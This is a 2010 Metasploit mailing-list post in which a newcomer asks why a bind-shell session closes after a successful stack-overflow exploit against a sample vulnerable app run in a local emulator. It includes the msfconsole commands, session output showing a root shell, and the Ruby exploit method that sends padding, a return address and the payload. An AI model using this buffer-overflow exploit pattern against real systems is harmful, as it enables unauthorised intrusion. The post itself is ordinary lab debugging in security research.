Metasploit mailing list archives

Unsuccessful connection after successful exploit

From: Eloi Sanfèlix <eloi () limited-entropy com>
Date: Thu, 11 Feb 2010 20:16:05 +0100

Hi all,

I'm quite new to Metasploit, and I've started by porting a little exploit
for a sample vulnerable app I had on my hard disk. I also ported an execve
payload and a bind shell payload just to see how the framework works.

When I run the exploit with the execve shellcode everything is fine, I can
see my shell pop in the attacked process under an emulator. However, when I
run the bind shell payload something weird happens. At a first attempt,
metasploit tries to connect to the new session, but fails and closes the
session:

msf exploit(stack) > set payload shell_bind_tcp
msf exploit(stack) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(stack) > set LPORT 1234
LPORT => 1234
msf exploit(stack) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:39112 -> 127.0.0.1:1234)


[*] Command shell session 1 closed.

However, if I look at my emulated system, the exploit actually succeeded and
it is executing a shell and listening for incoming connections on the
selected port. Now, if I call exploit again, metasploit successfully
connects to the shell created previously as you can see below:

msf exploit(stack) > exploit

[*] Started bind handler
[*] Command shell session 2 opened (127.0.0.1:59482 -> 127.0.0.1:1234)

/bin/id
uid=0(root) gid=0(root)

I tried to understand what is happening, but I fail to do so. In case it is
useful, here is the basic structure of my exploit:

       def exploit
          connect
          repeat = target['Offset']/4
          junk = "AAAA"*repeat
          sploit = junk + [target.ret].pack('V') +payload.encoded
          real_sploit = [sploit.length()].pack('V') + sploit
          sock.put(real_sploit)

          handler
          disconnect

       end

Pretty simple as you can see. Also, the payload has the same structure as
any other Bind TCP payload. Specifically, it defines the following handler
and session options:

                        'Handler'       => Msf::Handler::BindTcp,
                        'Session'       => Msf::Sessions::CommandShell,

Does anyone have an idea about why it could go wrong?

Thanks in advance for your feedback

Eloi

PS: I also tried adding a little delay between sending the payload and
calling handler, but it doesn't help.

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit HD Moore (Feb 11)
  - Re: Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
    - Re: Unsuccessful connection after successful exploit Patrick Webster (Feb 11)